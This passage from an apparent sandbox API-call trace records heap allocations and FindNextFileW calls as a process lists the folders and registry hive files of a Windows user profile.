ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0201.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c32b8 [0201.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x325fa0 [0201.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c32b8 | out: hHeap=0x2c0000) returned 1 [0201.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3845e8 [0201.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xfc) returned 0x32b69d8 [0201.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c32b8 [0201.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384650 [0201.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3310 [0201.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c34c8 [0201.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3470 [0201.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3846b8 [0201.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3208 | out: hHeap=0x2c0000) returned 1 [0201.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0201.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3520 | out: hHeap=0x2c0000) returned 1 [0201.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3578 | out: hHeap=0x2c0000) returned 1 [0201.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3368 | out: hHeap=0x2c0000) returned 1 [0201.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0201.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b2fd8 | out: hHeap=0x2c0000) returned 1 [0201.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0201.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3845e8 | out: hHeap=0x2c0000) returned 1 [0201.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x325fa0 | out: hHeap=0x2c0000) returned 1 [0201.029] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0201.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3368 [0201.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x325fa0 [0201.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3368 | out: hHeap=0x2c0000) returned 1 [0201.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3845e8 [0201.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0201.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3845e8 | out: hHeap=0x2c0000) returned 1 [0201.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x325fa0 | out: hHeap=0x2c0000) returned 1 [0201.030] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0201.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3368 [0201.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3578 [0201.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3520 [0201.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3578 | out: hHeap=0x2c0000) returned 1 [0201.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3368 | out: hHeap=0x2c0000) returned 1 [0201.030] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0201.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3845e8 [0201.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3b67078 [0201.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16c) returned 0x3294350 [0201.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3368 [0201.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3b670e0 [0201.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3578 [0201.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3208 [0201.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c35d0 [0201.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3b67148 [0201.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3b671b0 [0201.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3b67218 [0201.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3628 [0201.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c32b8 | out: hHeap=0x2c0000) returned 1 [0201.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384650 | out: hHeap=0x2c0000) returned 1 [0201.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3310 | out: hHeap=0x2c0000) returned 1 [0201.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c34c8 | out: hHeap=0x2c0000) returned 1 [0201.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3470 | out: hHeap=0x2c0000) returned 1 [0201.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3846b8 | out: hHeap=0x2c0000) returned 1 [0201.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0201.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0201.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3520 | out: hHeap=0x2c0000) returned 1 [0201.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0201.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0201.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67078 | out: hHeap=0x2c0000) returned 1 [0201.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3845e8 | out: hHeap=0x2c0000) returned 1 [0201.031] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd94853a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd94853a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0201.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3520 [0201.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3470 [0201.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c34c8 [0201.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3470 | out: hHeap=0x2c0000) returned 1 [0201.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3520 | out: hHeap=0x2c0000) returned 1 [0201.031] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0201.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3845e8 [0201.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0201.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3846b8 [0201.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0201.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3845e8 | out: hHeap=0x2c0000) returned 1 [0201.031] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0201.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3520 [0201.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3470 [0201.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3310 [0201.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3470 | out: hHeap=0x2c0000) returned 1 [0201.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3520 | out: hHeap=0x2c0000) returned 1 [0201.031] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x434de280, ftLastAccessTime.dwHighDateTime=0x1d60a66, ftLastWriteTime.dwLowDateTime=0x434de280, ftLastWriteTime.dwHighDateTime=0x1d60a66, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0201.031] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x434b8120, ftLastWriteTime.dwHighDateTime=0x1d60a66, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0201.031] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0201.031] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0201.031] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0201.032] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0201.032] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0201.032] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdad377e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdad377e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0201.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3520 [0201.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3470 [0201.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x214) returned 0x3314d10 [0201.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c32b8 [0201.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3845e8 [0201.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3680 [0201.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c36d8 [0201.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3730 [0201.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0201.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384650 [0201.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3b67078 [0201.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3788 [0201.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3b67280 [0201.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c37e0 [0201.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3b672e8 [0201.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3838 [0201.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3368 | out: hHeap=0x2c0000) returned 1 [0201.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b670e0 | out: hHeap=0x2c0000) returned 1 [0201.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3578 | out: hHeap=0x2c0000) returned 1 [0201.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3208 | out: hHeap=0x2c0000) returned 1 [0201.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c35d0 | out: hHeap=0x2c0000) returned 1 [0201.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67148 | out: hHeap=0x2c0000) returned 1 [0201.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b671b0 | out: hHeap=0x2c0000) returned 1 [0201.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67218 | out: hHeap=0x2c0000) returned 1 [0201.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3628 | out: hHeap=0x2c0000) returned 1 [0201.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0201.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c34c8 | out: hHeap=0x2c0000) returned 1 [0201.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3846b8 | out: hHeap=0x2c0000) returned 1 [0201.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3310 | out: hHeap=0x2c0000) returned 1 [0201.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3294350 | out: hHeap=0x2c0000) returned 1 [0201.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3310 [0201.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3470 | out: hHeap=0x2c0000) returned 1 [0201.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3520 | out: hHeap=0x2c0000) returned 1 [0201.033] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0201.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3520 [0201.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x325fa0 [0201.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3520 | out: hHeap=0x2c0000) returned 1 [0201.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3846b8 [0201.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0201.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3846b8 | out: hHeap=0x2c0000) returned 1 [0201.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x325fa0 | out: hHeap=0x2c0000) returned 1 [0201.033] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0201.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3520 [0201.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3470 [0201.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c34c8 [0201.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3470 | out: hHeap=0x2c0000) returned 1 [0201.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3520 | out: hHeap=0x2c0000) returned 1 [0201.033] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0201.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3846b8 [0201.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3b67218 [0201.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3b671b0 [0201.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67218 | out: hHeap=0x2c0000) returned 1 [0201.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3846b8 | out: hHeap=0x2c0000) returned 1 [0201.033] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0201.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3520 [0201.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3470 [0201.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3628 [0201.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3470 | out: hHeap=0x2c0000) returned 1 [0201.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3520 | out: hHeap=0x2c0000) returned 1 [0201.033] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0201.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3520 [0201.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3470 [0201.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c35d0 [0201.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3470 | out: hHeap=0x2c0000) returned 1 [0201.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3520 | out: hHeap=0x2c0000) returned 1 [0201.034] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, 